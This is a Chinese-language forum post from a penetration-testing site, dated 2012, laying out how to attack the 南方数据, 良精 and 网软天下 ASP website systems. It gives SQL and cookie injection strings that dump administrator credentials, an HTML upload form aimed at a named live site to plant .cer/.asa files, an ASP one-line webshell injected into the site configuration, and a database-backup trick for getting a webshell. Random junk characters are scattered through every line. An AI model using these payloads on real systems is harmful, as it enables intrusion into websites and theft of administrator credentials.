中国网络渗透测试联盟

标题: 南方数据网站管理系统注入漏洞&后台拿WebShell [打印本页]

作者: admin    时间: 2012-12-4 11:06
标题: 南方数据网站管理系统注入漏洞&后台拿WebShell
  /Databases/0791idc.mdb
8 Z+ x- _4 d4 D1.注入点:news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7 , @; S( M4 |2 T, ?- f
也可能是(另外一个版本)news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7+ g9 x% k. Z1 p# s% J) R) f
直接暴管理员帐号密码(md5)3 a1 @2 S* A# A) s: v
2.登陆后台+ J, N& S" L2 U, B- l9 ]4 |) q# ]
3.利用编辑器上传:, I( V: e& p( x
访问admin/southidceditor/admin_style.asp
7 C! K2 r5 ]9 ?3 T7 X0 b+ |修改编辑器样式,增加asa(不要asp).然后直接后台编辑新闻上传.
1 L( Q1 ]& h8 j) _# x' N) t) z$ t& `, p* k3 s
========================================* e" C  y6 b/ D9 V- z
1 D/ J0 N2 y/ C& H$ @2 ]8 \
参考资料整理:
/ U8 K1 W7 }  P- w8 e* P南方数据、良精系统、网软天下漏洞利用( _  z- C7 X# I# c! X7 l
8 \( X6 A6 `2 ^8 F; |) r" e1 }# {" s
1、通过upfile_other.asp漏洞文件直接取SHELL& t; R( @& j( A! C9 V- z
直接打开userreg.asp进行注册会员,进行登录,(在未退出登录的状态下)使用本地上传文件进行上传代码如下:, t9 U  i& `- e# J1 z6 v! ?& g
<HTML><HEAD>
# }! E6 s. }0 u# w& d5 S% {<META http-equiv=Content-Type content="text/html; charset=gb2312"> 8 I' t# a% s% H+ A/ [
<STYLE type=text/css>BODY { 0 q0 X% i0 [% i
FONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee / q* w8 x1 R6 M+ T7 g! z
}
' C( f# r: r4 G* W/ Y& L.tx1 {
$ s  y! I1 z" `1 R% v: t1 f  ?BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px 1 b3 `. v2 _+ X. w5 q8 z) ^
}
8 f/ v/ D" h# M" c6 ]</STYLE>
* q) ~) P' [" |<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD>
5 b5 s7 v2 {; ~6 l+ R<BODY leftMargin=0 topMargin=0> 6 l3 d# N& O/ P  d! H6 G  i
<FORM name=form1 action="http://www.huobaodidai.cn/upfile_Other.asp"; method=post 5 G% H4 i  \) m& G7 |
encType=multipart/form-data><INPUT class=tx1 type=file size=30 name=FileName> <INPUT class=tx1 type=file size=30 name=FileName1> <INPUT xxxxx="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上传 name=Submit> / z- Z7 K% u* L# W/ f9 A: a1 L) ?
<INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>. q* h% U, y' x2 l0 n" K

: O7 K* b9 @  j7 ?将以上代码保存为html格式,替换代码中的网址,第一个框里选择图片文件,第二个框选择.cer、.asa或asp文件上传(后面需要加一个空格,貌似在IE8中进行使用不能后面加空格,加空格时就弹出选择文件对话框,我是找不到解决办法)。
2 w1 T$ F+ L; C; ]. O# F1 R注:此方法通杀南方数据、良精系统、网软天下等* s' e# i! ^. c7 f2 T, L4 O; O! u; u
' C/ g9 d# I- D
2、通过注入秒杀管理员帐号密码,使用如下:
5 D! ]( C7 K' M1 B1 L" uhttp://www.huobaodidai.cn/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20’’=’+ [8 m0 ~, A9 |' {' R0 y. t9 X5 _
以上代码直接暴管理员帐号和密码,取SHELL方法如下:
7 e: D; x1 D7 t+ }) x) s在网站配置[http://www.target.com/admin/SiteConfig.asp]的版权信息里写入 "%><%eval(request(chr(35)))%><%’, c: w# d1 T+ Z, J$ h# \! i* w' S9 Z
成功把shell写入http://www.target.com/inc/config.asp3 C, s; h  Y# N5 H& s
这里一句话chr(32)密码是“#”' F/ g2 i/ y( K  g+ Z
3、cookie注入4 H3 @: t' y# X2 r
清空地址栏,利用union语句来注入,提交:- O4 t/ X) x. o$ T/ D9 ]6 U/ m
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin"))% Q' K6 W) N( D3 o- B6 M
如果你牛你就手工,反正我是不会,用刺猬大哥的“cookie注入转换工具”方便又迅速何乐而不为?1 T4 p$ l4 K. d  F; R
注:貌似南方数据、良精系统、网软天下等系统也都存在COOKIE注入。. d2 ~4 O( w! K8 ?  A
(当然南方不只有上面三个漏洞,还有几个漏洞貌似不常用,反正我给我常用的总结出来希望对大家有帮助)
, }0 z! `  B  E' J# k% T5 E6 m% I, o5 W
三、后台取SHELL方法总结
! R  \  x5 l/ N2 {  ?(1)在系统管理中的网站配置中插入一句话马:进入后台后,点左边的”系统管理”再点击”网站配置”在右边的”网站名称”(也可以在其它处)后加入"%><%Eval(Request(chr(112)))%><%’,再点保存配置,如图:
( s$ x! y+ Z! I6 g# f然后我们打开inc/config.asp文件,看到一句话马已写入到配置文件中了," e4 U3 R+ b) S1 C5 M
这时再打开一句话马的客户端,提交同样得到一个小马
# f: s2 T7 q0 F6 w2 m7 |2 {3 S. P(注:以下均在其它网站上测试所截的图,为防止信息泄漏,未截留网站连接,请谅解!)
2 F: m6 P! B; [8 f  f$ p(2)后台上传漏洞,在Upfile_Photo.asp文件中部分代码片段如下:* [4 f! O5 @1 b+ d6 L6 z
if fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then/ ?9 b! ]' t$ b  g# f
EnableUpload=false1 `# b! M6 {6 N6 q4 W
& r' x& P* s! ?8 y" A  ]
end if 5 k- G% W$ r: |. X2 l
if EnableUpload=false then( b" {( `! O2 v3 H- [
msg="这种文件类型不允许上传!nn只允许上传这几种文件类型:" & UpFileType
# m  ~) {% W: u9 c" o; I" e" H$ kFoundErr=true
4 e; W9 B" i2 Pend if
: `/ k( v3 F0 v  V* e大家可以看到程序只限制了对"asp","asa","aspx"类的文件上传,我们只要在”网站配置”的允许的上传文件类型处增加上传“cer“等被服务器可解析的文件类型就可,如图:, t1 g7 o" w- ~- z7 u8 F
提交时却显示下载页面 ,上传其它如”htr,cdx”等后缀文件时,提交时服务器却不请求(只能说运气不好吧)1 f8 ~" z6 k: r* T( u- z
(3)后台备份,直接在”产品管理”下的添加产品中上传jpg后缀的asp马,再到”系统管理”下的数据库备份,在”当前数据库路径”栏填入上传的路径,在” 备份数据库名称”填入你要备份马的名称,不过系统会在名称后自动添加上.asa的
. A$ j8 A& j. d/ m) _  |# M$ r# B+ m$ s2 z* M" y0 D
点”确定”后提示”备份数据库成功….”不过实际文件是没有.asa的1 k( t* @  [; A7 p3 _6 L# }5 Z
直接访问备份后的地址,就得到一个webshell% r% g" D9 u- D- d* S1 s: a
(以上虽用网软做的后台演示,但南方和良精后台取shell都是大同小异的)​




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2